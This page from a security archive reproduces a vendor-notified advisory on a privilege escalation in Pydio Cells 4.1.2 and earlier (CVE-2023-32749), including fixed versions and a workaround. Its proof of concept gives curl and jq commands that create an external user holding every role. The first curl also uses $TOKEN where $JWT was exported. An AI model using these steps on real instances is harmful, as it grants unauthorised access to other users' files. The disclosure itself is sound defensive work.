exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Pydio Cells 4.1.2 Privilege Escalation

Pydio Cells 4.1.2 Privilege Escalation
Posted May 30, 2023
Site redteam-pentesting.de

Pydio Cells versions 4.1.2 and below suffer from a privilege escalation vulnerability. It allows users, by default, to create so-called external users in order to share files with them. By modifying the HTTP request sent when creating such an external user, it is possible to assign the new user arbitrary roles. By assigning all roles to a newly created user, access to all cells and non-personal workspaces is granted.

tags | exploit, web, arbitrary
advisories | CVE-2023-32749
SHA-256 | 57d48188f889ecfd68177fabe259377f99ef7204208ed63108568aa4b966a11a

Pydio Cells 4.1.2 Privilege Escalation

Change Mirror Download
Advisory: Pydio Cells: Unauthorised Role Assignments

Pydio Cells allows users by default to create so-called external users
in order to share files with them. By modifying the HTTP request sent
when creating such an external user, it is possible to assign the new
user arbitrary roles. By assigning all roles to a newly created user, access to
all cells and non-personal workspaces is granted.


Details
=======

Product: Pydio Cells
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Privilege Escalation
Security Risk: high
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003
Advisory Status: published
CVE: CVE-2023-32749
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749


Introduction
============

"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."

(from the vendor's homepage)


More Details
============

Users can share cells or folders with other users on the same Pydio
instance. The web application allows to either select an already
existing user from a list or to create a new user by entering a new
username and password, if this functionality is enabled. When creating a
new user in this way, a HTTP PUT request like the following is sent:

------------------------------------------------------------------------
PUT /a/user/newuser HTTP/2
Host: example.com
User-Agent: agent
Authorization: Bearer O48gvjD[...]
Content-Type: application/json
Content-Length: 628
Cookie: token=AO[...]

{
"Attributes": {
"profile": "shared",
"parameter:core.conf:lang": "\"en-us\"",
"send_email": "false"
},
"Roles": [],
"Login": "newuser",
"Password": "secret!",
"GroupPath": "/",
"Policies": [...]
}
------------------------------------------------------------------------

The JSON object sent in the body contains the username and password
for the user to be created and an empty list for the key "Roles". The
response contains a JSON object similar to the following:

------------------------------------------------------------------------
{
"Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
"GroupPath": "/",
"Attributes": {
"parameter:core.conf:lang": "\"en-us\"",
"profile": "shared"
},
"Roles": [
{
"Uuid": "EXTERNAL_USERS",
"Label": "External Users",
"Policies": [...]
},
{
"Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
"Label": "User newuser",
"UserRole": true,
"Policies": [...]
}
],
"Login": "newuser",
"Policies": [....],
"PoliciesContextEditable": true
}
------------------------------------------------------------------------

The key "Roles" now contains a list with two objects, which seem to be
applied by default. The roles list in the HTTP request can be
modified to contain a list of all available UUIDs for roles, which can
be obtained by using the user search functionality. This results in a
new user account with all roles applied. By performing a login as the
newly created user, access to all cells and non-personal workspaces of
the whole Pydio instance is granted.


Proof of Concept
================

Login to the Pydio Cells web interface with a regular user and retrieve
the JWT from the HTTP requests. This can either be done using an HTTP
attack proxy or using the browser's developer tools. Subsequently, curl [1]
can be used as follows to retrieve a list of all users and their roles:

------------------------------------------------------------------------
$ export JWT="<insert JWT here>"
$ curl --silent \
--header "Authorization: Bearer $TOKEN" \
--header 'Content-Type: application/json' \
--data '{}' \
https://example.com/a/user | tee all_users.json

{"Users":[...]}
------------------------------------------------------------------------

Afterwards, jq [2] can be used to create a JSON document which can be
sent to the Pydio REST-API in order to create the external user "foobar"
with the password "hunter2" and all roles assigned:

------------------------------------------------------------------------
$ jq '.Users[].Roles' all_users.json \
| jq -s 'flatten | .[].Uuid | {Uuid: .}' \
| jq -s 'unique' \
| jq '{"Login": "foobar", "Password": "hunter2", "Attributes":
{"profile": "shared"}, "Roles": .}' \
| tee create_user.json

{
"Login": "foobar",
"Password": "hunter2",
"Attributes": {
"profile": "shared"
},
"Roles": [...]
}
------------------------------------------------------------------------

Finally, the following curl command can be issued to create the new external
user:

------------------------------------------------------------------------
$ curl --request PUT \
--silent \
--header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--data @create_user.json \
https://example.com/a/user/foobar
------------------------------------------------------------------------

Now, login with the newly created user to access all cells and
non-personal workspaces.

Workaround
==========

Disallow the creation of external users in the authentication settings.


Fix
===

Upgrade Pydio Cells to a version without the vulnerability.


Security Risk
=============

Attackers with access to any regular user account for a Pydio Cells instance can
extend their privileges by creating a new external user with all roles
assigned. Subsequently, they can access all folders and files in any
cell and workspace, except for personal workspaces. The creation of
external users is activated by default. Therefore, the vulnerability is
estimated to pose a high risk.


Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released


References
==========

[1] https://curl.se/
[2] https://stedolan.github.io/jq/


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Alter Posthof 1 Fax : +49 241 510081-99
52062 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close